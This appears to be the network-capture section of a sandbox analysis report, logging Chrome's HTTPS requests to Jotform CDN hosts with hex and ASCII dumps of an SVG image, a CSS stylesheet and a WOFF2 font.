                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 5c 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 5c 22 20 77 69 64 74 68 3d 5c 22 36 32 5c 22 20 68 65 69 67 68 74 3d 5c 22 36 32 5c 22 25 33 45 25 33 43 64 65 66 73 25 33 45 25 33 43 66 69 6c 74 65 72 20 69 64 3d 5c 22 61 5c 22 20 77 69 64 74 68 3d 5c 22 31 39 37 2e 32 25 32 35 5c 22 20 68 65 69 67 68 74 3d 5c 22 31 39 37 2e 32 25 32 35 5c 22 20 78 3d 5c 22 2d 34 38 2e 36 25 32 35 5c 22 20 79 3d 5c 22 2d 34 38 2e 36 25 32 35 5c 22 20 66 69 6c 74 65 72 55 6e 69 74 73 3d 5c 22 6f 62 6a 65 63 74 42 6f 75 6e 64 69 6e 67 42 6f 78 5c 22 25 33 45 25 33 43 66 65 4f 66 66 73 65 74 20 69 6e 3d 5c 22 53 6f 75 72 63 65 41 6c 70 68 61 5c 22 20
                                                                                                                                                                                                                                            Data Ascii: ta:image/svg+xml,%3Csvg xmlns=\"http://www.w3.org/2000/svg\" width=\"62\" height=\"62\"%3E%3Cdefs%3E%3Cfilter id=\"a\" width=\"197.2%25\" height=\"197.2%25\" x=\"-48.6%25\" y=\"-48.6%25\" filterUnits=\"objectBoundingBox\"%3E%3CfeOffset in=\"SourceAlpha\"
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 59 69 4c 7a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4d 54 49 75 4e 6a 41 34 49 44 49 77 4c 6a 67 33 61 43 30 75 4d 44 41 79 59 79 30 75 4d 7a 45 67 4d 43 30 75 4e 54 6b 74 4c 6a 45 79 4e 53 30 75 4e 7a 6b 79 4c 53 34 7a 4d 6a 5a 73 4c 54 55 75 4d 44 51 7a 4c 54 55 75 4d 44 45 32 59 54 45 75 4d 44 6b 79 49 44 45 75 4d 44 6b 79 49 44 41 67 4d 43 41 78 4c 53 34 79 4e 53 30 75 4e 6a 6b 31 59 7a 41 74 4c 6a 59 78 4c 6a 55 77 4d 69 30 78 4c 6a 45 77 4e 53 41 78 4c 6a 45 79 4c 54 45 75 4d 54 41 31 4c 6a 49 33 4e 43 41 77 49 43 34 31 4d 6a 51 75 4d 44 6b 33 4c 6a 63 78 4f 43 34 79 4e 54 68 73 4e 43 34 79 4e 54 4d 67 4e 43 34 79 4d 79 41 34 4c 6a 6b 31 4e 79 30 34 4c 6a 63 32 4e 57 4d 75 4d 6a 41 79 4c 53 34 78 4f 54 63 75 4e 44 67 74 4c 6a 4d 79 4c 6a 63 34 4f
                                                                                                                                                                                                                                            Data Ascii: YiLz48cGF0aCBkPSJNMTIuNjA4IDIwLjg3aC0uMDAyYy0uMzEgMC0uNTktLjEyNS0uNzkyLS4zMjZsLTUuMDQzLTUuMDE2YTEuMDkyIDEuMDkyIDAgMCAxLS4yNS0uNjk1YzAtLjYxLjUwMi0xLjEwNSAxLjEyLTEuMTA1LjI3NCAwIC41MjQuMDk3LjcxOC4yNThsNC4yNTMgNC4yMyA4Ljk1Ny04Ljc2NWMuMjAyLS4xOTcuNDgtLjMyLjc4O


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            4192.168.2.1749713104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC583OUTGET /s/portal/674ac14411e/static/css/jotform.css.e448a675.css HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC422INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/css; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 127730
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:15 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "17afd03a811487db52e8c2c176845073"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 258
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b28f418c2d-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC947INData Raw: 40 69 6d 70 6f 72 74 20 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 66 6f 6e 74 73 2f 3f 66 61 6d 69 6c 79 3d 43 69 72 63 75 6c 61 72 22 3b 40 70 72 6f 70 65 72 74 79 20 2d 2d 62 67 2d 6f 70 61 63 69 74 79 7b 73 79 6e 74 61 78 3a 22 3c 6e 75 6d 62 65 72 3e 22 3b 69 6e 68 65 72 69 74 73 3a 66 61 6c 73 65 3b 69 6e 69 74 69 61 6c 2d 76 61 6c 75 65 3a 31 7d 40 70 72 6f 70 65 72 74 79 20 2d 2d 63 6f 6c 6f 72 2d 6f 70 61 63 69 74 79 7b 73 79 6e 74 61 78 3a 22 3c 6e 75 6d 62 65 72 3e 22 3b 69 6e 68 65 72 69 74 73 3a 66 61 6c 73 65 3b 69 6e 69 74 69 61 6c 2d 76 61 6c 75 65 3a 31 7d 40 70 72 6f 70 65 72 74 79 20 2d 2d 62 6f 72 64 65 72 2d 6f 70 61 63 69 74 79 7b 73 79 6e 74 61 78 3a 22 3c 6e 75 6d 62 65 72 3e 22 3b 69 6e 68 65 72 69 74 73
                                                                                                                                                                                                                                            Data Ascii: @import "https://cdn.jotfor.ms/fonts/?family=Circular";@property --bg-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --color-opacity{syntax:"<number>";inherits:false;initial-value:1}@property --border-opacity{syntax:"<number>";inherits
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 69 74 73 3a 66 61 6c 73 65 3b 69 6e 69 74 69 61 6c 2d 76 61 6c 75 65 3a 31 7d 40 70 72 6f 70 65 72 74 79 20 2d 2d 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 7b 73 79 6e 74 61 78 3a 22 3c 6e 75 6d 62 65 72 3e 22 3b 69 6e 68 65 72 69 74 73 3a 66 61 6c 73 65 3b 69 6e 69 74 69 61 6c 2d 76 61 6c 75 65 3a 31 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 2a 3d 62 6f 72 64 65 72 5d 29 7b 62 6f 72 64 65 72 3a 30 20 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 63 6c 61 73 73 2a 3d 64 69 76 69 64 65 5d 29 3e 2a 7b 62 6f 72 64 65 72 3a 30 20 73 6f 6c 69 64 7d 5b 63 6c 61 73 73 2a 3d 6f 75 74 6c 69 6e 65 5d 7b 6f 75 74 6c 69 6e 65 3a 30 20 73 6f 6c 69 64 7d 5b 63 6c 61 73 73 2a 3d 62 6f 72 64 65 72 5d 2c 5b 63 6c 61 73 73 2a 3d 64 69 76 69 64 65
                                                                                                                                                                                                                                            Data Ascii: its:false;initial-value:1}@property --stroke-opacity{syntax:"<number>";inherits:false;initial-value:1}html :where([class*=border]){border:0 solid}html :where([class*=divide])>*{border:0 solid}[class*=outline]{outline:0 solid}[class*=border],[class*=divide
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 3b 2d 2d 6a 66 76 2d 6e 61 76 79 2d 33 30 30 3a 23 36 63 37 33 61 38 3b 2d 2d 6a 66 76 2d 6e 61 76 79 2d 34 30 30 3a 23 34 35 34 65 38 30 3b 2d 2d 6a 66 76 2d 6e 61 76 79 2d 35 30 30 3a 23 33 34 33 63 36 61 3b 2d 2d 6a 66 76 2d 6e 61 76 79 2d 36 30 30 3a 23 32 35 32 64 35 62 3b 2d 2d 6a 66 76 2d 6e 61 76 79 2d 37 30 30 3a 23 30 61 31 35 35 31 3b 2d 2d 6a 66 76 2d 6e 61 76 79 2d 38 30 30 3a 23 30 39 31 31 34 31 3b 2d 2d 6a 66 76 2d 6e 61 76 79 2d 39 30 30 3a 23 30 35 30 63 33 34 3b 2d 2d 6a 66 76 2d 67 72 61 79 2d 32 35 3a 23 66 31 66 31 66 34 3b 2d 2d 6a 66 76 2d 67 72 61 79 2d 35 30 3a 23 65 32 65 33 65 39 3b 2d 2d 6a 66 76 2d 67 72 61 79 2d 37 35 3a 23 64 33 64 36 64 65 3b 2d 2d 6a 66 76 2d 67 72 61 79 2d 31 30 30 3a 23 62 66 63 33 63 65 3b 2d 2d 6a 66
                                                                                                                                                                                                                                            Data Ascii: ;--jfv-navy-300:#6c73a8;--jfv-navy-400:#454e80;--jfv-navy-500:#343c6a;--jfv-navy-600:#252d5b;--jfv-navy-700:#0a1551;--jfv-navy-800:#091141;--jfv-navy-900:#050c34;--jfv-gray-25:#f1f1f4;--jfv-gray-50:#e2e3e9;--jfv-gray-75:#d3d6de;--jfv-gray-100:#bfc3ce;--jf
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 3b 2d 2d 6a 66 76 2d 74 65 61 6d 73 2d 64 61 72 6b 3a 23 30 63 31 35 34 30 7d 2e 73 74 72 6f 6b 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 7d 2e 63 75 72 73 6f 72 2d 70 6f 69 6e 74 65 72 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 63 75 72 73 6f 72 2d 6d 6f 76 65 7b 63 75 72 73 6f 72 3a 6d 6f 76 65 7d 2e 63 75 72 73 6f 72 2d 6e 6f 74 2d 61 6c 6c 6f 77 65 64 7b 63 75 72 73 6f 72 3a 6e 6f 74 2d 61 6c 6c 6f 77 65 64 7d 2e 63 75 72 73 6f 72 2d 61 75 74 6f 7b 63 75 72 73 6f 72 3a 61 75 74 6f 7d 2e 66 6f 6e 74 2d 63 69 72 63 75 6c 61 72 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 43 69 72 63 75 6c 61 72 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 48 65 6c 76 65 74 69 63 61 7d 2e 62 67 2d 6e 6f 2d 72 65 70 65 61 74 7b 62 61 63 6b 67
                                                                                                                                                                                                                                            Data Ascii: ;--jfv-teams-dark:#0c1540}.stroke{stroke-width:1px}.cursor-pointer{cursor:pointer}.cursor-move{cursor:move}.cursor-not-allowed{cursor:not-allowed}.cursor-auto{cursor:auto}.font-circular{font-family:Circular,BlinkMacSystemFont,Helvetica}.bg-no-repeat{backg
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 6c 65 2d 34 30 30 7b 2d 2d 66 72 6f 6d 2d 63 6f 6c 6f 72 3a 23 39 63 34 64 64 33 7d 2e 66 72 6f 6d 2d 6e 61 76 79 2d 35 30 7b 2d 2d 66 72 6f 6d 2d 63 6f 6c 6f 72 3a 23 65 33 65 35 66 35 7d 2e 74 6f 2d 6e 61 76 79 2d 35 30 7b 2d 2d 74 6f 2d 63 6f 6c 6f 72 3a 23 65 33 65 35 66 35 7d 2e 66 72 6f 6d 2d 6e 61 76 79 2d 39 30 30 7b 2d 2d 66 72 6f 6d 2d 63 6f 6c 6f 72 3a 23 30 35 30 63 33 34 7d 2e 61 70 70 65 61 72 61 6e 63 65 2d 6e 6f 6e 65 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 2d 6d 73 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 2e 61 70 70 65 61 72 61 6e 63 65 2d 6e 6f 6e 65 3a 3a 2d 77 65 62 6b 69 74 2d 69
                                                                                                                                                                                                                                            Data Ascii: le-400{--from-color:#9c4dd3}.from-navy-50{--from-color:#e3e5f5}.to-navy-50{--to-color:#e3e5f5}.from-navy-900{--from-color:#050c34}.appearance-none{-webkit-appearance:none;-moz-appearance:none;-ms-appearance:none;appearance:none}.appearance-none::-webkit-i
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 31 37 2c 32 32 37 2c 76 61 72 28 2d 2d 66 69 6c 6c 2d 6f 70 61 63 69 74 79 2c 31 29 29 7d 2e 66 69 6c 6c 2d 67 72 65 65 6e 2d 34 30 30 7b 66 69 6c 6c 3a 72 67 62 61 28 31 32 37 2c 32 30 32 2c 30 2c 76 61 72 28 2d 2d 66 69 6c 6c 2d 6f 70 61 63 69 74 79 2c 31 29 29 7d 2e 66 69 6c 6c 2d 67 72 65 65 6e 2d 35 30 30 7b 66 69 6c 6c 3a 72 67 62 61 28 31 30 30 2c 31 37 38 2c 30 2c 76 61 72 28 2d 2d 66 69 6c 6c 2d 6f 70 61 63 69 74 79 2c 31 29 29 7d 2e 66 69 6c 6c 2d 79 65 6c 6c 6f 77 2d 35 30 30 7b 66 69 6c 6c 3a 72 67 62 61 28 32 34 39 2c 31 36 34 2c 30 2c 76 61 72 28 2d 2d 66 69 6c 6c 2d 6f 70 61 63 69 74 79 2c 31 29 29 7d 2e 66 69 6c 6c 2d 79 65 6c 6c 6f 77 2d 36 30 30 7b 66 69 6c 6c 3a 72 67 62 61 28 32 34 34 2c 31 34 36 2c 30 2c 76 61 72 28 2d 2d 66 69 6c 6c
                                                                                                                                                                                                                                            Data Ascii: 17,227,var(--fill-opacity,1))}.fill-green-400{fill:rgba(127,202,0,var(--fill-opacity,1))}.fill-green-500{fill:rgba(100,178,0,var(--fill-opacity,1))}.fill-yellow-500{fill:rgba(249,164,0,var(--fill-opacity,1))}.fill-yellow-600{fill:rgba(244,146,0,var(--fill
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 65 72 63 61 73 65 7d 2e 70 2d 30 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 70 78 2d 30 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 2e 70 79 2d 30 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 70 74 2d 30 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 2e 70 62 2d 30 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 70 6c 2d 30 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 70 72 2d 30 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 5b 64 69 72 3d 72 74 6c 5d 20 2e 72 74 6c 5c 3a 70 72 2d 30 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 2e 70 2d 31 7b 70 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 7d 2e 70 78 2d 31 7b 70 61 64 64 69 6e 67 2d 6c 65
                                                                                                                                                                                                                                            Data Ascii: ercase}.p-0{padding:0}.px-0{padding-left:0;padding-right:0}.py-0{padding-top:0;padding-bottom:0}.pt-0{padding-top:0}.pb-0{padding-bottom:0}.pl-0{padding-left:0}.pr-0{padding-right:0}[dir=rtl] .rtl\:pr-0{padding-right:0}.p-1{padding:.25rem}.px-1{padding-le
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 7d 2e 70 79 2d 36 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 2e 35 72 65 6d 7d 2e 70 74 2d 36 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 2e 35 72 65 6d 7d 2e 70 62 2d 36 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 2e 35 72 65 6d 7d 2e 70 6c 2d 36 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 2e 70 72 2d 36 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 7d 2e 70 78 2d 37 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 37 35 72 65 6d 7d 2e 70 74 2d 37 7b 70 61 64 64 69 6e 67
                                                                                                                                                                                                                                            Data Ascii: adding-left:1.5rem;padding-right:1.5rem}.py-6{padding-top:1.5rem;padding-bottom:1.5rem}.pt-6{padding-top:1.5rem}.pb-6{padding-bottom:1.5rem}.pl-6{padding-left:1.5rem}.pr-6{padding-right:1.5rem}.px-7{padding-left:1.75rem;padding-right:1.75rem}.pt-7{padding
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 2d 32 5c 2e 35 7b 70 61 64 64 69 6e 67 3a 2e 36 32 35 72 65 6d 7d 2e 70 78 2d 32 5c 2e 35 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 36 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 36 32 35 72 65 6d 7d 2e 70 79 2d 32 5c 2e 35 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 36 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 36 32 35 72 65 6d 7d 2e 70 6c 2d 32 5c 2e 35 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 36 32 35 72 65 6d 7d 2e 70 2d 33 5c 2e 35 7b 70 61 64 64 69 6e 67 3a 2e 38 37 35 72 65 6d 7d 2e 70 79 2d 33 5c 2e 35 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 38 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 38 37 35 72 65 6d 7d 2e 73 70 61 63 65 2d 78 2d 31 3e 2a 2b 2a 7b 6d 61 72 67 69 6e 2d 6c
                                                                                                                                                                                                                                            Data Ascii: -2\.5{padding:.625rem}.px-2\.5{padding-left:.625rem;padding-right:.625rem}.py-2\.5{padding-top:.625rem;padding-bottom:.625rem}.pl-2\.5{padding-left:.625rem}.p-3\.5{padding:.875rem}.py-3\.5{padding-top:.875rem;padding-bottom:.875rem}.space-x-1>*+*{margin-l
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC1369INData Raw: 2d 68 65 69 67 68 74 3a 32 72 65 6d 7d 2e 6c 69 6e 65 2d 68 65 69 67 68 74 2d 34 78 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 35 72 65 6d 7d 2e 6c 69 6e 65 2d 68 65 69 67 68 74 2d 36 78 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 38 37 35 72 65 6d 7d 2e 74 72 61 63 6b 69 6e 67 2d 78 78 78 73 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2d 2e 30 32 31 65 6d 7d 2e 74 72 61 63 6b 69 6e 67 2d 78 78 73 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2d 2e 30 31 39 65 6d 7d 2e 74 72 61 63 6b 69 6e 67 2d 78 73 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2d 2e 30 31 37 65 6d 7d 2e 74 72 61 63 6b 69 6e 67 2d 73 6d 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2d 2e 30 31 34 65 6d 7d 2e 74 72 61 63 6b 69 6e 67 2d 6d 64 7b 6c 65 74 74 65 72 2d 73
                                                                                                                                                                                                                                            Data Ascii: -height:2rem}.line-height-4xl{line-height:2.5rem}.line-height-6xl{line-height:2.875rem}.tracking-xxxs{letter-spacing:-.021em}.tracking-xxs{letter-spacing:-.019em}.tracking-xs{letter-spacing:-.017em}.tracking-sm{letter-spacing:-.014em}.tracking-md{letter-s


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            5192.168.2.1749707172.67.7.1074435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:35:55 UTC578OUTGET /fonts/circular/fonts/Circular-Book.woff2 HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: font
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:35:55 GMT
                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            last-modified: Fri, 17 May 2024 07:14:50 GMT
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=315360000
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb5b26d451a07-EWR
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC961INData Raw: 33 37 63 62 0d 0a 77 4f 46 32 00 01 00 00 00 01 0d bf 00 12 00 00 00 03 8d 28 00 01 0b 80 00 03 00 00 00 01 0b e8 00 00 01 d7 00 00 04 9f 00 00 00 00 00 00 00 00 1b 81 cd 7c 1c a5 68 14 85 77 06 60 00 89 0a 08 5e 09 82 73 11 10 0a 89 a0 7c 88 c6 13 12 81 f9 38 01 36 02 24 03 97 4c 0b 97 50 00 04 20 05 8c 0a 07 b5 01 0c 84 71 5b b2 52 b3 03 fe 35 0e df 6f e5 da b8 38 00 09 61 c9 36 bb 86 b7 55 9b 0c 91 de 38 2e 88 72 98 d6 38 d7 39 36 05 f8 99 32 aa d0 80 03 d1 39 f7 a8 95 bb 55 56 a8 62 2c 8e b2 ff ff ff ff ff ff ff ff ff 8d c9 22 e6 6c 77 8e 9b 6b 20 22 88 05 89 68 0f 96 8f 9a 8f 10 39 e7 c4 07 4a 0c 29 4a 5e 50 42 98 44 55 4e a3 f8 4a 66 52 c7 d8 c4 79 2b 8b b8 5c 2d 75 08 6b 54 a6 48 cd 75 d7 94 69 d3 f6 92 be d4 76 a3 72 bf 46 2e 11 79 48 21 71 2d 83
                                                                                                                                                                                                                                            Data Ascii: 37cbwOF2(|hw`^s|86$LP q[R5o8a6U8.r89629UVb,"lwk "h9J)J^PBDUNJfRy+\-ukTHuivrF.yH!q-
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: fa 6e 09 1b 0b 56 01 8b 28 58 c1 a0 05 51 04 31 c1 06 4c 14 1b 15 a3 c0 88 82 2f a3 5f fe df 00 e3 db 8a d7 d7 fd 5f cd 55 7d b8 55 c1 ac 45 20 0d 1e ef 31 91 aa ae 81 da 79 4d b0 bc 79 bd e6 39 1c f7 8a 4b 4b 04 46 22 3e 6a 28 cf d3 ce f7 85 0a 30 eb ae 28 b2 71 37 9b f0 cc 47 38 90 11 6f f0 26 52 60 89 06 9a 06 b6 98 77 5f ef f1 b9 d0 ff 5a ec e0 31 0c 9f cf 72 18 0e 04 83 18 9a a1 5e 0b 56 11 ed c5 dd 04 08 10 80 78 7e 5c bd bf 38 95 ca 90 94 d7 cc 07 26 e6 0b 21 51 0b 7a 6c e9 70 e9 d9 da 0e de 39 66 77 e7 01 f2 30 26 b1 ce b7 ad fe 5b e2 de 6f 77 5e 7f 48 26 1e b5 54 36 74 6c cd 51 1f 58 57 86 69 00 81 00 8c 3f e6 ca be 27 cb 92 2d 19 88 0b a8 ab 1a d3 53 09 77 fe 4c 3e 13 9d 16 61 8e 0b 74 dd d3 ce 75 89 e6 a7 eb 7d 8f 8a 2d 4b b6 fa d9 9f da 4e 27
                                                                                                                                                                                                                                            Data Ascii: nV(XQ1L/__U}UE 1yMy9KKF">j(0(q7G8o&R`w_Z1r^Vx~\8&!Qzlp9fw0&[ow^H&T6tlQXWi?'-SwL>atu}-KN'
                                                                                                                                                                                                                                            2025-01-10 12:35:56 UTC1369INData Raw: 96 d0 2c 71 ef fa fe 70 f6 2f a1 3d f9 0a e7 9d 18 4c 68 83 15 52 99 e8 37 dc 7b 81 6f 9e 6d 2f d4 68 7d 22 7e bf 57 ad c5 f1 96 fe 75 2f 64 53 9a 9d 48 36 a0 46 9f 41 a2 6e bd 1f df ad da c0 9e f8 e7 e4 6c 44 91 52 5a 2a 96 b4 b1 67 05 fc 7f db ec e7 86 51 48 ca aa 0a a9 78 c0 2b 83 7f 59 ec 2c 7d ef f4 58 5b 54 fd ba 6b 37 0a 17 89 95 8a 19 d0 63 6c ef 3f dd f6 43 97 85 d5 bc 4a e0 0e 39 04 fe ad 54 e5 fb e0 8e 17 ae d0 c0 a0 dd a9 46 ca 25 39 29 b7 fa e3 cf f9 0f f6 7d dd f1 dd bc b1 3b 6c 0b 22 ca 10 59 09 24 21 e3 0c e1 79 2f 22 f3 7e 86 bd 9b 6b 09 35 ac 52 0a 0b 4f df ef f7 6f ee 2a f3 3a 26 99 ea 79 93 f7 39 69 d7 ba 0c 8d a2 76 09 28 22 22 e6 f1 3f f9 89 35 c0 ab de 21 00 fe 3c 31 e7 00 ca 9f b7 86 6a 20 84 00 14 80 17 be 30 ef f7 f1 62 a0 fe 90
                                                                                                                                                                                                                                            Data Ascii: ,qp/=LhR7{om/h}"~Wu/dSH6FAnlDRZ*gQHx+Y,}X[Tk7cl?CJ9TF%9)};l"Y$!y/"~k5ROo*:&y9iv(""?5!<1j 0b
